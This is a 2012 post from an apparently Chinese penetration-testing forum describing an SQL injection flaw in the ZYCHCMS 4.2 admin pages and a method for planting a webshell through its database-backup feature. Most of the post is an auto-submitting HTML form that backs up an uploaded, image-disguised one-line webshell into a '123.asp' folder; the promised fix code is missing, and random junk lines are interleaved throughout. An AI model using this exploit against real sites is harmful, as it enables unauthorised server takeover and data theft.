中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
- M% N) |. s# B, ]
4 y8 { X+ o7 h
~ j1 P9 o# j, n$ j" p+ t
1 A2 E$ l2 c! Z- M. N: x. f9 M( a
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
: s0 M4 p3 d: B
①SQL注射漏洞
% r: q# t' m( `$ f, Q5 [1 j9 R
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
1 Q# e' A8 N8 T; J( ]
漏洞原因:未过滤
+ Z* b) j9 P& ~
漏洞代码:
! V* v5 i9 j8 d/ U: r. i
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
( O8 ` \6 ]: C. ?% W
修复方法:在文件开头加入代码
8 m t! S0 \( X6 M
# u1 E+ L* \# T" M' e
8 l( h8 J) z4 V% F! a' }
②后台拿WBSHELL
4 z( v6 m+ u9 D1 |8 |& ~
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
0 ~" Q- |' z4 E- L7 t- Y
这里在网上找了一个,改了下,将就着用。
; n% u# K- J n$ k, Z ?% y
以下是代码本地提交代码
3 k$ [% p+ @4 A0 @% P9 P( ?
& k6 J' I: I+ n$ n
4 U) C; k: m7 V4 `5 c
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
! o/ Y- P, i4 C/ ~8 n) D8 v z9 d
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
; y7 Z# V6 x" @0 n! H% x& U6 v
<tr>
: F+ L/ s# J& z! ~
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
; ^, s, Z+ V( U+ H+ K! B
</tr>
8 W& q) ^9 N4 T1 @$ d4 X
<tr>
& M" k3 c Q$ ], z
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
/ x2 m" a/ @* T: r- l1 V y
</span>
; P$ m" V. U4 y2 B; o5 W
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
5 |8 f$ J- b$ b: c# e4 B0 U- r" @
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
- v$ w& q$ G5 p7 a. S; R
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
9 T$ N T$ [! n8 K
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
+ O9 ~8 Q, Y4 }8 y0 C% r( [
<div align=”left”>
. s& b, j/ c: T1 _% b9 L
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
9 H7 e5 B- F( b% t5 ?8 S6 v4 D
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
9 v2 u' }" k& ~1 m9 o) S7 @
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
, z. n& P1 g! \6 \0 ` O7 B
</div></td>
. t5 {& J; {$ b& D$ k
</tr>
* ~; t, U1 L3 Y g2 D1 C
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
8 D! h' i% k+ e: U; V
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
7 X& ~% k* ^/ g R! `! R7 @- Y
<td class=”td”><div align=”left”>
0 t. g0 R0 \% R) {
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
" k. Q9 N: A; E) V
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
1 N+ N ]- _+ p3 R$ m& o# p
</tr>
5 W. Z$ R: ?" x# k9 ~
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
& i- M: t" ^, k; ?# U9 j
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
. h- Z3 r+ n9 m7 b; b. T
<td class=”td”><div align=”left”>
+ C. W" x0 _; X
<input type=”submit” value=”确定备份” class=”btn”
1 ], i+ ]( a9 L9 z; E& A9 p7 H* [7 y/ l
</div></td>
- o; O, k: ]. ?# ^" W, \; f6 b
</tr>
! |2 e M% u* {+ z
</table></td></tr></form>
1 C& l2 ?3 Z; m: k( k
</table>
- @7 y- e( u3 l9 q5 x! ^
</td>
& n; S3 w1 H/ e' x' L" T
</tr>
0 [, Y% s6 e& l) O# e$ m
</table>
9 B- Z& L# _( e, i0 ^ q
<script>
" `4 G+ F* o% p d! S; u
document.all.add.submit();
. |: s, F- L$ F
</script>
s; C0 K$ `5 G7 T
5 h, `8 C# u% x7 l0 l2 e
8 ~9 i. R5 j9 }
. f e4 I( B* b8 x* p" `0 V& B( I$ X
# n9 A: f! K- t
9 N' w) `0 R/ F" T: x
" D- z; f6 s1 [- v3 Y' }& e
5 S6 m5 z# O6 v8 Z* X/ w
+ ?" J% `& N6 n! N1 N
7 s% y( P M1 N+ d9 {0 J
0 B; K: ^9 n7 X" I% i) ~' O
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2